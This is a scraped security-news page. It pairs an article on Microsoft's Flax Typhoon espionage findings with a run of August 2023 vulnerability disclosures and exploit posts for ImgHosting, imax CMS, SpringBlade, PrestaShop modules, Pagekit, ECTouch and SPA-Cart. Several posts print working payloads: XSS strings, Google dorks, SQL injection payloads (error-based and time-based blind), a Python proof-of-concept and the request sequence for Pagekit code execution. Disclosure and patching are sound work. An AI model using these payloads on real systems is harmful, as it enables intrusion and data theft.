By Deeba Ahmed
Researchers believe that this time instead of cyber espionage, Chinese threat actors may have opted for more complex information ops.
This is a post from HackRead.com Read the original post: Microsoft: Chinese APT Flax Typhoon uses legit tools for cyber espionage

**KEY FINDINGS**

*   **Microsoft has identified a Chinese government-backed APT group called Flax Typhoon.**

*   **The group has been targeting Taiwanese organizations since mid-2021.**

*   **Flax Typhoon does not rely heavily on malware to maintain persistence on the targeted networks.**

*   **Instead, the group uses tools built into the operating system and some benign software.**

*   **The group’s goal is to conduct cyber espionage and maintain access to organizations across a broad range of industries.**

Microsoft has not observed Flax Typhoon act on final objectives in this campaign, but the group’s activities could pose a threat to businesses outside Taiwan.

Microsoft Threat Intelligence Team has shared exclusive details of a newly detected Chinese government-backed Advanced Persistent Threat (APT) group Flax Typhoon’s activities. The group (aka Ethereal Panda) has been installing a network of long-term, persistent infections across Taiwanese organizations. 

It is worth noting that the group doesn’t rely too much on malware to retain persistence on the targeted networks but uses tools built into the operating system with some benign software for this purpose.

Moreover, researchers observed that the group uses the access to carry out many different activities apart from espionage, which means it is an information-gathering campaign active since mid-2021.

> “Flax Typhoon’s discovery and credential access activities do not appear to enable further data-collection and exfiltration objectives. While the actor’s observed behavior suggests Flax Typhoon intents to perform espionage and maintain their network footholds, Microsoft has not observed Flax Typhoon act on final objectives in this campaign.”
> 
> Microsoft

So far, dozens of organizations across a wide range of sectors/industries have been targeted in this campaign, indicating that this could be an extensive cyber espionage activity.

However, Microsoft believes its scope may not be limited to Taiwanese businesses in the near future. The group uses legit tools and utilities built into the Windows OS (e.g. LOLbins) for its stealthy operations, which it can reuse to target organizations outside Taiwan.  

Researchers revealed that companies may easily fall into the trap of Flax Typhoon because it uses commonplace techniques that may be overlooked by organizations. 

In its report, the tech giant noted that This APT group focuses on persistence, credential access, and lateral movement. Detecting and mitigating this threat is challenging because compromised accounts might be modified or closed, and infected systems will be isolated.

Companies/entities in the government, education, IT, and manufacturing sectors across Southeast Asia, Africa, and North America have been the targets of Flax Typhoon’s previous campaigns. 

The group prefers using the China Chopper web shell, Bad Potato and Juicy Potato privilege escalation tools, Metasploit, Mimikatz, SoftEther virtual private network (VPN) client and specializes in exploiting known vulnerabilities in publicly accessible servers and targets a range of services, including VPN, web, Java, and SQL applications.

After gaining initial access, the group uses command-line tools for establishing persistence and then deploys a VPN connection to the attacker’s C2 infrastructure. Lastly, it steals credentials and scans for further vulnerabilities using VPN access.

Flax Typhoon attack chain (Microsoft)

This isn’t the first time China has targeted Taiwan, which it considers a renegade province. The country has launched espionage and DDoS attacks against the country in the past. This time, China might want access to sensitive data as well as maintain access to organizations across the broadest range of industries.

Microsoft has notified targeted/impacted customers and is helping them secure their systems.

**RELATED ARTICLES**

1.  Microsoft warns of Nobelium hackers using FoggyWeb backdoor
2.  New Phishing Attack Spoofs Microsoft 365 Authentication System
3.  Reply URL Flaw Allowed Unauthorized MS Power Platform API Access

Microsoft: Chinese APT Flax Typhoon uses legit tools for cyber espionage

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

In SpringBlade V3.6.0 when executing SQL query, the parameters submitted by the user are not wrapped in quotation marks, which leads to SQL injection.

**SpringBlade vulnerable to SQL injection**

High severity GitHub Reviewed Published Aug 29, 2023 to the GitHub Advisory Database • Updated Aug 31, 2023

GHSA-62pr-54gv-vg5g: SpringBlade vulnerable to SQL injection

CVE-2023-40787

\[description\]

In SpringBlade V3.6.0 when executing SQL query, the parameters

submitted by the user are not wrapped in quotation marks, which leads to SQL injection

\[Vulnerability Type\]

SQL Injection

\[Vendor of Product\]

https://github.com/chillzhuang/SpringBlade

\[Affected Product Code Base\]

SpringBlade - V3.6.0

\[Attack Type\]

Remote

\[Discoverer\]

cyvk

CVE-2023-40787: CVE-2023-40787

Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.

In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39650
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsblog
*   **Impacted release**: <= 4.0.1 (4.0.2 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TvcmsBlogSingleModuleFrontController::run() have a sensitive SQL call that can be executed with a trivial HTTP call and exploited to forge a SQL injection.

If your server do not manage correctly these HTTP headers (which will be the case for all servers not managed by a professional system administrator), you are concerned:

*   CLIENT\_IP
*   X\_FORWARDED\_FOR
*   X\_FORWARDED
*   FORWARDED\_FOR
*   FORWARDED

See recommendations if needed about this.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.1**

    --- 4.0.1/tvcmsblog/controllers/front/single.php
    +++ 4.0.2/tvcmsblog/controllers/front/single.php
    ...
        public function initContent()
        {
            $ipaddress = '';
            if (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
            } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED'];
            } elseif (isset($_SERVER['REMOTE_ADDR'])) {
                $ipaddress = $_SERVER['REMOTE_ADDR'];
            } else {
                $ipaddress = 'UNKNOWN';
            }
            $blogid = $this->blogpost['id_tvcmsposts'];
    
    -       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . $blogid . ' AND `ipadress` = \'' . $ipaddress . '\' ';
    +       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . (int) $blogid . ' AND `ipadress` = \'' . pSQL($ipaddress) . '\' ';
            $ans = Db::getInstance()->executeS($select_data);
    
            if (1 > $ans[0]['max_id']) {
                $dataquery = 'INSERT INTO `' . _DB_PREFIX_ . 'tvcmsposts_view`
                                    SET 
    -                                   `id_tvcmsposts` = ' . $blogid . ',
    +                                   `id_tvcmsposts` = ' . (int) $blogid . ',
    -                                    ipadress = \'' . $ipaddress . '\'';
    +                                    ipadress = \'' . pSQL($ipaddress) . '\'';
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsblog**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   These HTTP headers are not supposed to be used on a final application, since they should be used only if REMOTE_ADDR is allowed with modules like mod\_remoteip for Apache2, so you should auto-delete them if you are not behind a well setup load-balancer or reverse proxy.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

The author provided a patch, but it still contains all critical vulnerabilities.

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39650: [CVE-2023-39650] Improper neutralization of SQL parameters in Theme Volty CMS Blog module for PrestaShop

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

theme volty tvcmsvideotab up to v4.0.0 was discovered to contain a SQL injection vulnerability via the component TvcmsVideoTabConfirmDeleteModuleFrontController::run().

In the module “Theme Volty Video Tab” (tvcmsvideotab) up to version 4.0.0 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39652
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsvideotab
*   **Impacted release**: <= 4.0.0 (4.0.1 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The methods TvcmsVideoTabConfirmDeleteModuleFrontController::run() and TvcmsVideoTabSaveVideoModuleFrontController::run() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.0**

    --- 4.0.0/tvcmsvideotab/controllers/front/confirmdelete.php
    +++ 4.0.1/tvcmsvideotab/controllers/front/confirmdelete.php
    class TvcmsVideoTabConfirmDeleteModuleFrontController extends ModuleFrontController
    {
        /**
         * @see FrontController::postProcess()
         */
        public function run()
        {
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
        -   $id_product = Tools::getValue('id');
        +   $id_product = (int) Tools::getValue('id');
        -   $id_lang = Tools::getValue('id_lang');
        +   $id_lang = (int) Tools::getValue('id_lang');
            $id_shop = $this->context->shop->id;
        }
    }
    

    --- 4.0.0/tvcmsvideotab/controllers/front/savevideo.php
    +++ XXXXX/tvcmsvideotab/controllers/front/savevideo.php
    class TvcmsVideoTabSaveVideoModuleFrontController extends ModuleFrontController
    {
        public function run()
        {
            $ok = '';
            $id_lang_default = Configuration::get('PS_LANG_DEFAULT');
            $ob_lang_default = new Language($id_lang_default);
            $name_lang_default = $ob_lang_default->name;
    -       $id_shop = Tools::getValue('id_shop');
    +       $id_shop = (int) Tools::getValue('id_shop');
    -       $name_shop = Tools::getValue('name_shop');
    +       $name_shop = pSQL(Tools::getValue('name_shop'));
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
            $url = $_SERVER['SCRIPT_FILENAME'];
            $url = rtrim($url, 'index.php');
            $languages = Language::getLanguages();
    -       $type_video = Tools::getValue('type_video');
    +       $type_video = pSQL(Tools::getValue('type_video'));
    -       $id_product = Tools::getValue('id_product');
    +       $id_product = (int) Tools::getValue('id_product');
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsvideotab**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

Author provide a patch which still own all criticals vulnerabilities

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39652: [CVE-2023-39652] Improper neutralization of SQL parameter in Theme Volty Video Tab module for PrestaShop

ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.

#SQL Injection Vulnerability in ECTouch v2

###Vulnerability Position

In the insert\_bought\_notes function on line 285 in the \\ectouch-main\\include\\apps\\default\\helpers\\insert.php file, the incoming $arr\['id'\] parameter is not verified, resulting in a sql injection vulnerability.

###POC

Use python to write scripts for vulnerability verification.

#!/usr/bin/python
\# -\*- coding: utf-8 -\*-
\# @Author : qyg
\# @File : sqli check for ECTouch v2
\# @function : Detect for SQL injection vulnerabilities in ECTouch.

import requests,re

#your target
target \= 'http://127.0.0.1/'

payload \= '/index.php?m=default&c=user&a=register&u=0'

url \= target + payload

headers \= {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54',
    'Referer': '554fcae493e564ee0dc75bdf2ebf94cabought\_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}'
}

response \= requests.get(url, headers\=headers)

print(response.text)

match \= re.search('XPATH syntax error: \\'~(.\*)~\\'',response.text)

if match:
    print("There is SQL injection vulnerability, and you are currently using the following database:" + match.group(1))

Running results:

CVE-2023-39560: GitHub - Luci4n555/cve_ectouch: detail

SPA-Cart eCommerce CMS version 1.9.0.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection# Exploit Author: CraCkEr# Date: 20/08/2023# Vendor: SPA-Cart# Vendor Homepage: https://spa-cart.com/# Software Link: https://demo.spa-cart.com/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4548# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /searchGET parameter 'filter[brandid]' is vulnerable to SQL Injectionhttps://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black---Parameter: filter[brandid] (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black---[-] Done

Tag

#sql